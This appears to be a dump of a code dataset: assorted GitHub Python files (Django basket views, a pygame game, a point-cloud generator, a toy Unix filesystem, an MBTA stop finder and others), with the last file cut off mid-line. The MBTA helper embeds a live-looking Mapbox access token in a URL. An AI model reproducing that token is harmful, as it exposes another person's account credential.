md5(f\"cache_{func.__name__}_{args}_{kwargs}\")\n output = Path(location) / Path(k) / '__output.pkl'\n\n if output.is_file():\n return joblib.load(output)\n\n else:\n logger.info(f\"CacheKey: {k}\")\n output.parent.mkdir(parents=True, exist_ok=True)\n _ = func(*args, **kwargs)\n joblib.dump(_, output)\n return _\n\n\ndef submit(scores=100.00, filename='result.json'):\n print(pd.Series(scores).value_counts())\n df_label[['car_id']][7117:].assign(score=scores).to_json(filename, 'records')\n\n\n@disk_cache\ndef load_data():\n dfs = pd.read_excel('data.xlsx', sheet_name=None)\n df_label = pd.read_json('phase1_train.json').append(pd.read_json('phase1_test.json'), ignore_index=True)\n return dfs, df_label\n\n\ndfs, df_label = load_data()\ndf_label = df_label.assign(\n label_100=lambda df: np.where(df.score >= 100, 1, 0),\n label_99=lambda df: np.where(df.score >= 99, 1, 0),\n label_98=lambda df: np.where(df.score >= 98, 1, 0),\n label_97=lambda df: np.where(df.score >= 97, 1, 0),\n label_96=lambda df: np.where(df.score >= 96, 1, 0),\n)\ncar_id_set = set(df_label.car_id)\n\ncolumns = {\n '车辆牌照号': 'car_id',\n '车牌号': 'car_id',\n '车牌号码': 'car_id',\n '单位名称': '企业名称'\n}\nfor sheet in dfs:\n dfs[sheet] = dfs[sheet].rename(columns=columns).dropna(axis=1, how='all').drop_duplicates()\n\n# df_label[df_label.car_id.isin(dfs['运政车辆年审记录信息'][lambda df: df['审批结果']=='年审不合格'].car_id)] # 有车牌颜色会变 脏数据\ndf_运政车辆年审记录信息 = (\n dfs['运政车辆年审记录信息'].replace({'年审合格': 1, '年审不合格': 0})\n .pivot_table(values='审批结果', columns='年审年度', aggfunc=max, index='car_id')\n .add_prefix('年审')\n .assign(年审sum=lambda df: df.sum(1))\n .reset_index()\n)\n\ndf_车辆违法违规信息 = (\n dfs['车辆违法违规信息(道路交通安全,来源抄告)'].assign(道路交通安全=1)\n .append(dfs['车辆违法违规信息(交通运输违法,来源抄告)'].assign(道路交通安全=0)).sort_values(['car_id', '违规时间'], ignore_index=True)\n)\ndf_车辆违法违规信息['违规时间'] = pd.to_datetime(df_车辆违法违规信息['违规时间'])\ndf_车辆违法违规信息['违规时间间隔'] = df_车辆违法违规信息.groupby('car_id')['违规时间'].diff().dt.days\ndf_车辆违法违规信息 = df_车辆违法违规信息.groupby('car_id').agg({'道路交通安全': ['nunique', 'count'], '违规时间间隔': ['mean', 'std']})\ndf_车辆违法违规信息.columns = ['_'.join(i) for i in df_车辆违法违规信息.columns]\ndf_车辆违法违规信息.reset_index(inplace=True)\n\n\ndf_动态监控报警信息 = dfs['动态监控报警信息(车辆,超速行驶)'].append(dfs['动态监控报警信息(车辆,疲劳驾驶)']).drop_duplicates().replace({'超速报警': 0, '疲劳报警': 1})\n\n\ndef kurt(x):\n return x.kurt()\n\nfuncs = ['sum','max','min','mean','median','std'] + ['skew', kurt]\nagg_func = {\n '报警类型': 'count',\n '最高时速(Km/h)': funcs,\n '持续点数': funcs,\n '持续时长(秒)': funcs,\n # '时间差': funcs,\n}\ndf_报警类型 = df_动态监控报警信息.groupby('报警类型').agg(agg_func)\ndf_报警类型.columns = ['_'.join(i) for i in df_报警类型.columns]\n\ndf_动态监控报警信息 = df_动态监控报警信息.merge(df_报警类型.reset_index())\n\n\nagg_func = dict(zip(df_报警类型.columns, [['mean', 'std']]*len(df_报警类型.columns)))\nagg_func['car_id'] = 'count'\nagg_func['报警类型'] = agg_func['最高时速(Km/h)'] = agg_func['持续点数'] = agg_func['持续时长(秒)'] = funcs\n\n\ndf_动态监控报警信息 = df_动态监控报警信息.groupby('car_id').agg(agg_func)\ndf_动态监控报警信息.columns = ['_'.join(i) for i in df_动态监控报警信息.columns]\ndf_动态监控报警信息.reset_index(inplace=True)\n\n\ndf = (\n df_label\n .merge(dfs['运政车辆信息'], 'left')\n .merge(dfs['运政业户信息'][['企业名称', '业户ID']], 'left')\n .merge(dfs['运政质量信誉考核记录'].sort_values('考核日期').drop_duplicates('业户ID', 'last').replace({'优良(AAA)': 0, '合格(AA)': 1, '基本合格(A)': 2, '不合格(B)': 3}), 'left')\n .merge(dfs['动态监控上线率(企业,%)'], 'left')\n .merge(df_运政车辆年审记录信息, 'left')\n .merge(df_动态监控报警信息, 'left')\n .merge(df_车辆违法违规信息, 'left')\n)\n\nfor feat in df.columns:\n if feat in ['label', 'car_id']:\n continue\n if df[feat].dtypes!='float':\n df[feat] = LabelEncoder().fit_transform(df[feat]) \n","repo_name":"yuanjie-ai/AIZoo","sub_path":"__CompetitionBaseline/2022中国华录杯数据湖算法大赛—企业安全风险评估赛道/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":5316,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"8245621301","text":"from django.contrib import messages\nfrom django.views import View\nfrom django.views.generic import FormView\nfrom django.shortcuts import redirect, get_object_or_404\nfrom webapp.forms import BasketAddForm\nfrom webapp.models import Product, Basket\n\n\nclass BasketAddFormView(FormView):\n form_class = BasketAddForm\n\n def post(self, request, *args, **kwargs):\n product = get_object_or_404(Product, pk=kwargs.get('pk'))\n form = self.get_form_class()(request.POST)\n if form.is_valid():\n number = form.cleaned_data.get('number')\n\n if not Basket.objects.filter(product=product).exists():\n # Проверяем остаток товаров на складе по введенному числу\n if number > product.balance:\n messages.error(\n request,\n f'На складе всего {product.balance} товаров,'\n f' поэтому добавление {number} невозможно'\n )\n return redirect('index')\n Basket.objects.create(product=product, number=number)\n messages.success(request, 'Желаемое количество товаров успешно добавлено!')\n else:\n basket = Basket.objects.filter(product=product).first()\n # Проверяем остаток товаров на складе по введенному числу + числу в корзине\n if (number + basket.number) > product.balance:\n messages.error(\n request,\n f'Вы пытаетесь добавить {number + basket.number} с учетом {basket.number},'\n f' которые уже добавили, а на складе всего {product.balance}'\n )\n return redirect('index')\n basket.number += number\n basket.save()\n messages.success(request, 'Желаемое количество товаров успешно добавлено!')\n return redirect('index')\n\n\nclass BasketDeleteOneView(View):\n def get(self, request, *args, **kwargs):\n basket_product = get_object_or_404(Basket, pk=kwargs.get('pk'))\n if not basket_product.number == 1:\n basket_product.number -= 1\n basket_product.save()\n messages.success(request, 'Количество товара в корзине уменьшено на 1')\n else:\n basket_product.delete()\n messages.success(request, 'Товар был удален из корзины, так как был в 1-ом числе')\n return redirect('basket_list')\n\n\nclass BasketDeleteView(View):\n\n def post(self, request, *args, **kwargs):\n basket_product = get_object_or_404(Basket, pk=kwargs.get('pk'))\n basket_product.delete()\n messages.success(request, 'Товар удален из корзины')\n return redirect('basket_list')\n","repo_name":"TagleD/homework_60_gleb_tarakanov","sub_path":"source/webapp/views/baskets.py","file_name":"baskets.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34293200723","text":"################# Turtle - speed, size, goto, penup/down #################\n\nimport turtle\n\ns = turtle.Screen()\nt = turtle.Turtle()\n\n# setare viteza desenare\nt.speed(1)\n\n# setare grosime creion\nt.pensize(2)\n\n# ridica creionul(cursorul) de pe canvas\nt.penup()\n\n# muta creionul (cursorul) la coorodonatele (0, 0)\nt.goto(0, 0)\n\n# pune creionul inapoi pe canvas\nt.pendown()\n\nt.goto(0, 100)\n\n# ascunde cursorul\nt.hideturtle()\ns.mainloop()","repo_name":"flaviaalexandra11/lectii-python","sub_path":"ex-turtle/exemple/2_goto.py","file_name":"2_goto.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27562885142","text":"import random\nimport numpy as np\nfrom shapely.geometry import Point\nfrom shapely.geometry.polygon import Polygon\nimport csv\nimport collections\nfrom numpy.linalg import lstsq\nfrom numpy import ones, vstack\n\nBUFFER = 1\nPOINTS_PER_POLYGON = 1000\n\nMAX_DATA_NUM = 100\nCONVEX_OPT = 'convex'\nSET_NUM = 5\nDATA_DIR = \"../data/problem3/extruded/\"\n\nMINIMUM_RATIO = 0.6\nVOXEL = 20\nINTERVAL = int(100 / VOXEL)\nVOXEL_SHAPE = (VOXEL, VOXEL, VOXEL)\nEquation = collections.namedtuple('Equation', 'a b c') # ax + by + c = 0\n\n\ndef make_equation_list(x_data, y_data):\n equations = []\n for i in range(len(x_data) - 1):\n x_coords = [x_data[i], x_data[i + 1]]\n y_coords = [y_data[i], y_data[i+1]]\n equ = make_equation(x_coords, y_coords)\n equations.append(equ)\n return equations\n\n\ndef make_equation(x_coords, y_coords):\n assert ((x_coords[0] != x_coords[1]) | (y_coords[0] != y_coords[1]))\n # x = c\n if x_coords[0] == x_coords[1]:\n equ = Equation(1, 0, -x_coords[0])\n return equ\n\n A = vstack([x_coords, ones(len(x_coords))]).T\n m, c = lstsq(A, y_coords)[0] # y = mx + c\n equ = Equation(m, -1, c)\n return equ\n\n\ndef generate_random_point_in_rectangle(center, buffer):\n x_value = random.randrange(center[0]-buffer, center[0]+buffer+1)\n y_value = random.randrange(center[1]-buffer, center[1]+buffer+1)\n return x_value, y_value\n\n\ndef generate_points_along_sides(x_data, y_data, point_num):\n equations = make_equation_list(x_data, y_data)\n\n pc = []\n for step in range(point_num):\n r_index = random.randrange(0, len(equations))\n x_coords = [x_data[r_index], x_data[r_index+1]]\n y_coords = [y_data[r_index], y_data[r_index+1]]\n equ = equations[r_index]\n\n min_x = min(x_coords)\n max_x = max(x_coords)\n x_random = random.randrange(min_x, max_x + 1)\n b = equ.b\n if b == 0:\n low = min(y_coords) - BUFFER\n upp = max(y_coords) + BUFFER\n y_random = random.randrange(low, upp + 1)\n elif b == -1:\n y_random = int(equ.a * x_random + equ.c)\n else:\n return\n result_x, result_y = generate_random_point_in_rectangle([x_random, y_random], BUFFER)\n pc.append([result_x, result_y, 0])\n return pc\n\n\ndef create_polygon(x_coords, y_coords):\n xy = zip(x_coords, y_coords)\n return Polygon(xy)\n\n\ndef generate_points_along_top_bottom(x_data, y_data, point_num, top_height):\n pc = []\n pg = create_polygon(x_data, y_data)\n min_x = min(x_data)\n max_x = max(x_data)\n min_y = min(y_data)\n max_y = max(y_data)\n\n while len(pc) < point_num:\n random_x = random.randrange(min_x, max_x+1)\n random_y = random.randrange(min_y, max_y+1)\n\n if not pg.contains(Point(random_x, random_y)):\n continue\n\n is_in_top = random.randrange(0, 2)\n if is_in_top:\n random_height = random.randrange(top_height - BUFFER, top_height + BUFFER + 1)\n else:\n random_height = random.randrange(0, BUFFER + 1)\n pc.append([random_x, random_y, random_height])\n return pc\n\n\ndef make_target_point(x_data, y_data, max_height, want_in=False):\n min_x = min(x_data)\n max_x = max(x_data)\n min_y = min(y_data)\n max_y = max(y_data)\n pg = create_polygon(x_data, y_data)\n\n x_dist = max_x - min_x\n y_dist = max_y - min_y\n if want_in:\n random_x = random.randrange(int(min_x), int(max_x) + 1)\n random_y = random.randrange(int(min_y), int(max_y) + 1)\n random_height = random.randrange(0, int(max_height) + 1)\n else:\n random_x = random.randrange(int(min_x - x_dist * 0.5), int(max_x + x_dist * 0.5) + 1)\n random_y = random.randrange(int(min_y - y_dist * 0.5), int(max_y + y_dist * 0.5) + 1)\n random_height = random.randrange(0, int(max_height * 1.5) + 1)\n if random_height > 100:\n random_height = 100\n\n label = pg.contains(Point(random_x, random_y)) and random_height < max_height\n return [random_x, random_y, random_height], label\n\n\ndef generate_data(solids_reader, vector_writer, raster_writer):\n num_of_out = 0\n write_num = 0\n solids = []\n for rid, row in enumerate(solids_reader):\n solids.append(row)\n\n vector_rows = []\n raster_rows = []\n\n while write_num < MAX_DATA_NUM:\n row = solids[random.randrange(0, rid + 1)]\n if write_num % 10 == 0:\n print(write_num, \"...\")\n\n convex_ratio = row[0]\n num_sides = row[1]\n height = row[2]\n polygon_coords = row[3:]\n polygon_coords.extend([polygon_coords[0], polygon_coords[1]])\n x_data = polygon_coords[0:][::2]\n y_data = polygon_coords[1:][::2]\n\n # pointcloud polygon\n pcp_list = generate_points_along_sides(x_data, y_data, POINTS_PER_POLYGON * 4)\n for point in pcp_list:\n point[2] = random.randrange(0, height + 1)\n\n pcp_list_2 = generate_points_along_top_bottom(x_data, y_data, POINTS_PER_POLYGON * 2, height)\n pcp_list.extend(pcp_list_2)\n pcp_flatten_list = [element for tupl in pcp_list for element in tupl]\n\n if num_of_out > MAX_DATA_NUM / 2:\n target_point, label = make_target_point(x_data, y_data, height, True)\n else:\n target_point, label = make_target_point(x_data, y_data, height)\n\n if not label:\n if num_of_out > MAX_DATA_NUM * MINIMUM_RATIO:\n continue\n num_of_out += 1\n '''\n vector data\n target point, [boundary_points], label\n '''\n vector_row = target_point\n vector_row.extend(pcp_flatten_list)\n vector_row.append(int(label))\n # vector_writer.writerow(vector_row)\n vector_rows.append(vector_row)\n\n '''\n raster data\n [voxel] label\n '''\n voxel = np.zeros(VOXEL_SHAPE)\n for point in pcp_list:\n x = int(point[0] / INTERVAL)\n x = min(x, VOXEL - 1)\n x = max(x, 0)\n y = int(point[1] / INTERVAL)\n y = min(y, VOXEL - 1)\n y = max(y, 0)\n z = int(point[2] / INTERVAL)\n z = min(z, VOXEL - 1)\n z = max(z, 0)\n voxel[x][y][z] = 1\n\n x = int(target_point[0] / INTERVAL)\n x = min(x, VOXEL - 1)\n x = max(x, 0)\n y = int(target_point[1] / INTERVAL)\n y = min(y, VOXEL - 1)\n y = max(y, 0)\n z = int(target_point[2] / INTERVAL)\n z = min(z, VOXEL - 1)\n z = max(z, 0)\n voxel[x][y][z] = 2\n\n raster_row = [int(item2) for sublist in voxel for item in sublist for item2 in item]\n raster_row.append(int(label))\n # raster_writer.writerow(raster_row)\n raster_rows.append(raster_row)\n\n write_num += 1\n random.shuffle(vector_rows)\n random.shuffle(raster_rows)\n vector_writer.writerows(vector_rows)\n raster_writer.writerows(raster_rows)\n\n\nif __name__ == \"__main__\":\n solids_csv = open(DATA_DIR + CONVEX_OPT + \"_solids.csv\", newline='')\n solids_reader = csv.reader(solids_csv, quoting=csv.QUOTE_NONNUMERIC)\n\n raster_test_csv = open(DATA_DIR + CONVEX_OPT + \"/raster/\" + str(VOXEL) + \"/test\" + \".csv\", 'w', encoding='utf-8', newline='')\n raster_test_writer = csv.writer(raster_test_csv)\n\n vector_test_csv = open(DATA_DIR + CONVEX_OPT + \"/vector/\" + str(VOXEL) + \"/test\" + \".csv\", 'w', encoding='utf-8', newline='')\n vector_test_writer = csv.writer(vector_test_csv)\n\n for set_num in range(SET_NUM):\n print(\"Train \", set_num)\n raster_train_csv = open(DATA_DIR + CONVEX_OPT + \"/raster/\" + str(VOXEL) + \"/training_\" + str(set_num) + \".csv\", 'w', encoding='utf-8', newline='')\n raster_train_writer = csv.writer(raster_train_csv)\n\n vector_train_csv = open(DATA_DIR + CONVEX_OPT + \"/vector/\" + str(VOXEL) + \"/training_\" + str(set_num) + \".csv\", 'w', encoding='utf-8', newline='')\n vector_train_writer = csv.writer(vector_train_csv)\n\n solids_csv.seek(0)\n generate_data(solids_reader, vector_train_writer, raster_train_writer)\n\n raster_train_csv.close()\n vector_train_csv.close()\n print(\"Test \")\n\n solids_csv.seek(0)\n generate_data(solids_reader, vector_test_writer, raster_test_writer)\n raster_test_csv.close()\n vector_test_csv.close()\n\n\n\n\n\n\n","repo_name":"cocoslime/point-in-PC-polygon","sub_path":"pointcloud-polygon-generator/problem3-extrude-pc.py","file_name":"problem3-extrude-pc.py","file_ext":"py","file_size_in_byte":8340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9323076591","text":"# Your API KEYS (you need to use your own keys - very long random characters)\n# from config import MAPBOX_TOKEN, MBTA_API_KEY\nimport requests\nimport json\nimport math\nfrom math import radians, cos, sin, asin, sqrt\n# Useful URLs (you need to add the appropriate parameters for your requests)\nMAPBOX_BASE_URL = \"https://api.mapbox.com/geocoding/v5/mapbox.places\"\nMBTA_BASE_URL = \"https://api-v3.mbta.com/stops\"\n\n\n# A little bit of scaffolding if you want to use it\n\ndef distance(lat1, lon1, lat2, lon2):\n # Haversine formula to calculate distance\n radius = 6371 # km\n\n dlat = math.radians(lat2 - lat1)\n dlon = math.radians(lon2 - lon1)\n a = (math.sin(dlat / 2) ** 2 + \n math.cos(math.radians(lat1)) * math.cos(math.radians(lat2)) *\n math.sin(dlon / 2) ** 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n distance = radius * c\n\n return distance\n\n\ndef get_json(url: str) -> dict:\n \"\"\"\n Given a properly formatted URL for a JSON web API request, return a Python JSON object containing the response to that request.\n Both get_lat_long() and get_nearest_station() might need to use this function.\n \"\"\"\n response = requests.get(url)\n data = response.json()\n return data\n pass\n\n\ndef get_lat_long(place_name: str) -> tuple[str, str]:\n \"\"\"\n Given a place name or address, return a (latitude, longitude) tuple with the coordinates of the given place.\n\n See https://docs.mapbox.com/api/search/geocoding/ for Mapbox Geocoding API URL formatting requirements.\n \"\"\"\n url = f\"https://api.mapbox.com/geocoding/v5/mapbox.places/{place_name}.json?access_token=pk.eyJ1IjoiYWRyaWFuY3Jpb2xsbyIsImEiOiJjbGZ2dGFwNXMwMTA2M2RxN3YwdGN4amNpIn0.QVp_50lEd72_KTRGfz-PPA\" \n data = get_json(url)\n coords = data['features'][0]['geometry']['coordinates']\n lat_long = (coords[1],coords[0])\n return lat_long\n \ndef get_nearest_station(latitude: str, longitude: str) -> tuple[str, bool]:\n \"\"\"\n Given latitude and longitude strings, return a (station_name, wheelchair_accessible) tuple for the nearest MBTA station to the given coordinates.\n\n See https://api-v3.mbta.com/docs/swagger/index.html#/Stop/ApiWeb_StopController_index for URL formatting requirements for the 'GET /stops' API.\n \"\"\"\n response = requests.get(f'https://api-v3.mbta.com/stops?sort=distance&filter%5Blatitude%5D={latitude}&filter%5Blongitude%5D={longitude}')\n data = response.json()\n mapdict = data[\"data\"][0]\n station_name = mapdict['attributes']['name']\n if(mapdict['attributes']['wheelchair_boarding'] >= 1):\n wheelchair = True\n else:\n wheelchair = False\n\n return (station_name,wheelchair)\n\n\n\ndef find_stop_near(place_name: str) -> tuple[str, bool]:\n \"\"\"\n Given a place name or address, return the nearest MBTA stop and whether it is wheelchair accessible.\n\n This function might use all the functions above.\n \"\"\"\n long_lat = get_lat_long(place_name)\n nearest_station = get_nearest_station(long_lat[0],long_lat[1])\n return nearest_station[0]\n\n\ndef main():\n \"\"\"\n You can test all the functions here\n \"\"\"\n #print(test_api())\n #print(get_json('https://api-v3.mbta.com/stops'))\n print(get_lat_long(\"Boston Commons\"))\n print(get_nearest_station('42.3541047','-71.064822'))\n print(find_stop_near(\"Boston Commons\"))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"adriancriollo/mbtahelper","sub_path":"mbta_helper.py","file_name":"mbta_helper.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21565774927","text":"import logging\n\nTOL = 1.e-10 # Floating point tolerance.\nONE_THIRD = 0.3333333333333333 # One third: nothing more, nothing less.\nGROWTH_LIMIT = 5 # Limits area of boundary triangles.\nOVERLAP_TRIM_FACTOR = 0.995 # Reduces sphere radii to avoid overlaps.\n\nLOG_FORMAT = '%(name)-8s %(levelname)-8s %(asctime)s.%(msecs)03d : %(message)s'\nTIME_STAMP_FORMAT = '%d-%m-%y %H:%M:%S'\nformatter = logging.Formatter(LOG_FORMAT, TIME_STAMP_FORMAT)\n\nlogger = logging.getLogger('MSP-Build')\nstream_h = logging.StreamHandler()\nfile_h = logging.FileHandler('msp.log', mode='w')\nfor handler in (stream_h, file_h):\n handler.setFormatter(formatter)\n logger.addHandler(handler)\nlogger.setLevel(logging.DEBUG)\n","repo_name":"chrisk314/mesh-sphere-packing","sub_path":"mesh_sphere_packing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"76"} +{"seq_id":"23690038478","text":"\n# -- python imports --\nimport pandas as pd\n\nfrom ._debug import VERBOSE\nfrom ._write import *\nfrom ._convert import *\nfrom ._utils import *\n\ndef append_new_pair(data,uuid_file,new_pair):\n existing_uuid = get_uuid_from_config(data,new_pair.config)\n existing_config = get_config_from_uuid(data,new_pair.uuid)\n if existing_uuid == -1 and existing_config == -1:\n data.uuid.append(new_pair.uuid)\n data.config.append(new_pair.config)\n write_uuid_file(uuid_file,data)\n else:\n if VERBOSE: print(\"Not appending data to file since data already exists.\")\n if existing_uuid != -1 and VERBOSE:\n print(f\"UUID already exists: [{new_pair.uuid}]\")\n if existing_config == -1 and VERBOSE:\n print(f\"Config already exists\")\n print_config(new_pair.config)\n\ndef set_new_field_default(data,new_field,default):\n configs = pd.DataFrame(data.config)\n keys = list(configs.columns)\n if new_field in keys:\n if VERBOSE: print(f\"Not appending new field [{new_field}]. Field already exists.\")\n return -1\n configs[new_field] = default\n data.config = configs.to_dict()\n return 1\n\ndef set_new_field_data(data,new_data,new_field):\n for uuid,new_results in zip(new_data.uuid,new_data.results):\n index = np.where(data.uuid == uuid)[0]\n data.config[index][new_field] = new_results\n\n__all__ = ['append_new_pair','set_new_field_default','set_new_field_data']\n\n\n","repo_name":"gauenk/cl_gen","sub_path":"lib/cache_io/uuid_cache/_append.py","file_name":"_append.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24145856148","text":"\"\"\"\nTARJETA DE CREDTO\n\n1 - Recibir por consola el valor de una compra\n2 - que se pueda ingresar el numero de cuotas con las que se va a pagar\n3 - Calcular el valor de la cuota\nNota: no calcular intereses\nUsando un ciclo While queremos que imprima el plan de pago y le muestre el cupo liberado con cada pago.\n\npara que genere el plan de pagos : imprimir cuanto paga en cada cuota y cuanto resta del monto inicial \"\"\"\n\n\nValorCompra = int(input(\"Ingrese el valor Total de la compra = \"))\ncuota = int(input(\"Ingrese el numero de cuotas = \"))\n\nvalor_total = ValorCompra/cuota \ncuota_num = 1\n\nwhile ValorCompra > 0:\n print(\"Cuota\" , cuota_num, \" a pagar = \" ,valor_total)\n ValorCompra -= valor_total\n cuota_num += 1\n print(\"Restante por pagar: \" ,ValorCompra)\n \nprint(\"Felicitaciones, El Credito ha sido Cancelado!\")\n","repo_name":"Edna2607/Nuevas_Tecnologias_Edna","sub_path":"TarjetaCredito.py","file_name":"TarjetaCredito.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38101360949","text":"\"\"\"\nFile/Directory level abstractions go here\n\nAuthor: Angad Gill\n\"\"\"\nfrom typing import List, Tuple\nfrom unix_fs.data_structures import Inode, DataBlock, DirectoryBlock\n\nclass File(Inode):\n def __init__(self, device=None, index=None):\n super().__init__(i_type=1, device=device, index=index)\n\n def write(self, data):\n \"\"\" Write to the File. Allocate DataBlocks and write text to them \"\"\"\n # TODO: This is basically \"append\" right now. Update when \"seek\" is added\n # Check to see if any DataBlock is already assigned\n if sum(self.address_direct) != 0:\n # If assigned, append data to last block\n last_assigned = self._last_assigned_address()\n block = DataBlock(device=self._device, index=last_assigned)\n excess_data = block.append(data)\n else:\n excess_data = data\n\n # Add all excess data into new blocks\n while len(excess_data) > 0:\n # assign a new block and add to Inode\n block = DataBlock(device=self._device)\n self._add_to_address_list(block)\n # Write to block\n excess_data = block.append(excess_data)\n\n def read(self):\n \"\"\" Reads and returns the first block, for now \"\"\"\n data = ''\n for address in self.address_direct:\n if address != 0:\n block = DataBlock(device=self._device, index=address)\n data += block.data\n else:\n break\n return data\n\n\nclass Directory(Inode):\n def __init__(self, device, index=None):\n super().__init__(i_type=2, device=device, index=index)\n\n # TODO: Name assignment to directory is clunky\n @property\n def name(self) -> str:\n if self.address_direct[0] == 0:\n raise AttributeError(\"{}.name not set yet\".format(self.__class__))\n else:\n block = DirectoryBlock(device=self._device, index=self.address_direct[0])\n return block.name\n\n @name.setter\n def name(self, name, write_through=True) -> None:\n if self.address_direct[0] == 0:\n block = DirectoryBlock(device=self._device)\n self._add_to_address_list(block)\n else:\n block = DirectoryBlock(device=self._device, index=self.address_direct[0])\n block.name = name\n if write_through:\n block.__write__()\n\n def add(self, entry_name, entry_inode):\n \"\"\" Add to the Directory. Allocate DirectoryBlocks and write name and inodes to them \"\"\"\n\n # Check to see if name already exits\n existing_names, _ = self.read()\n if entry_name in existing_names:\n raise Exception('{}: entry already exists'.format(self.__class__))\n\n # Check to see if any DirectoryBlocks is already assigned\n if sum(self.address_direct) != 0:\n # If assigned, append data to last block\n last_assigned = self._last_assigned_address()\n block = DirectoryBlock(device=self._device, index=last_assigned)\n if block.is_full():\n # Assign a new block\n block = DirectoryBlock(device=self._device)\n self._add_to_address_list(block)\n else:\n # assign a new block and add to Inode\n block = DirectoryBlock(device=self._device)\n self._add_to_address_list(block)\n # Write to block\n block.add_entry(entry_name=entry_name, entry_inode_index=entry_inode)\n\n def remove(self, entry_name, entry_inode):\n \"\"\" Remove from Directory \"\"\"\n if sum(self.address_direct) == 0:\n raise Exception('{} {} contains no files'.format(self.__class__, self.index))\n\n for address in self.address_direct:\n block = DirectoryBlock(device=self._device, index=address)\n try:\n block.remove_entry(entry_name=entry_name, entry_inode_index=entry_inode)\n # TODO: Change this to not use try except\n except Exception:\n continue\n\n def read(self) -> Tuple[List[str], List[int]]:\n \"\"\" Reads entry names and inode numners from directory \"\"\"\n entry_names = [] # type: List\n entry_inodes = [] # type: List\n for address in self.address_direct:\n if address != 0:\n block = DirectoryBlock(device=self._device, index=address)\n for e in block.entry_names:\n if e != '':\n entry_names += [e]\n for e in block.entry_inode_indices:\n if e != 0:\n entry_inodes += [e]\n else:\n break\n return entry_names, entry_inodes\n","repo_name":"angadgill/unix-fs-py","sub_path":"unix_fs/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73948020084","text":"import pygame\nimport os\nimport sys\n\nfrom Objects.player import Player\nfrom Objects.enemy import Enemy\nfrom Objects.health import Health\nfrom Objects.counter import Counter\n\ndef load_image(file_name):\n path = os.path.join(get_resource_path(), file_name)\n return pygame.image.load(path)\n\ndef get_resource_path():\n if hasattr(sys, '_MEIPASS'):\n return sys._MEIPASS\n else:\n return ''\n\nbackground_image = load_image(\"resources/Sprites/office.png\")\n\nclass Game:\n def __init__(self, screen, clock):\n self.player = Player(screen)\n self.health = Health(screen)\n self.counter = Counter()\n self.enemies = []\n self.frame_count = 0\n self.keep_playing = True\n self.main_menu = False\n self.screen = screen\n self.clock = clock\n self.dt = 0\n self.prev_score = 0\n self.enemy_speed = 2\n self.spawn_rate = 200\n\n def play(self):\n #Refreshes screen\n self.screen.fill(\"white\")\n self.screen.blit(background_image, (0, 0))\n self.health.draw(self.screen)\n \n #controls enemy spawn rate\n if self.frame_count % self.spawn_rate == 0:\n new_enemy = Enemy(self.player.x, self.player.y, 50, 50, (255, 0, 0), self.get_difficulty())\n self.enemies.append(new_enemy)\n\n #controls enemy behavior\n for enemy in self.enemies:\n enemy.move(self.player.x, self.player.y)\n enemy.draw(self.screen)\n #create boundaries to prevent enemy from moving into hit boxes if collisions are true\n if enemy.check_collision(self.player.get_hitbox()):\n self.health.damage(self.player.damaged)\n self.player.damage()\n #Checks for game over state \n if self.health.game_over():\n self.main_menu = True\n self.keep_playing = False\n self.counter.save_high_score()\n if enemy.check_collision(self.player.hammer):\n #player gets a point\n enemy.die()\n self.counter.increment(self.screen)\n\n #Counter instantiation\n self.counter.draw(self.screen, 20, 65) # Adjust the position of the counter on the screen\n\n #controls player behavior\n self.player.draw(self.screen, self.frame_count) \n keys = pygame.key.get_pressed()\n if keys[pygame.K_q]:\n self.keep_playing = False\n self.main_menu = True\n self.counter.save_high_score()\n\n self.player.move(keys, self.dt, self.frame_count)\n\n #Tracks frames/frame rate\n self.dt = self.clock.tick(60) / 1000\n self.frame_count += 1\n return self.keep_playing, self.main_menu\n\n def get_difficulty(self):\n score = self.counter.value\n if (score - self.prev_score) >= 5:\n self.prev_score = score\n if self.enemy_speed < 5:\n self.enemy_speed += .10\n if self.spawn_rate > 20:\n self.spawn_rate -= 20\n return self.enemy_speed\n return self.enemy_speed\n","repo_name":"smrrobison/Mrs.Barry","sub_path":"Objects/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26304045977","text":"from sqlalchemy import create_engine\nimport pandas as pd\nimport numpy as np\n\ndef get_feature_dtypes(connect_string, table):\n engine = create_engine(connect_string)\n df = pd.read_sql(f\"select feature,dtype from {table}_features\", engine)\n features = df.set_index('feature')['dtype'].to_dict()\n return features\n\ndef get_projection(connect_string, table):\n engine = create_engine(connect_string)\n df = pd.read_sql(f\"select * from {table}_projection\", engine).reset_index()\n projection = df.to_dict('records')\n return projection\n\ndef get_predicate_data(model, predicate, connect_string, table):\n engine = create_engine(connect_string)\n predicate_data = []\n for feature in predicate.feature_values.keys():\n features_str = f'{model},{feature}'\n where = predicate.query(exclude=feature)\n if where == \"\":\n query = f\"select {features_str} from {table}\"\n else:\n query = f\"select {features_str} from {table} where {where}\"\n df = pd.read_sql(query, engine)\n df['anomaly'] = predicate.contains(df, features=[feature])\n predicate_data.append({'x': feature, 'y': model.lower(), 'data': df[[feature, model.lower(), 'anomaly']].to_dict('records')})\n return 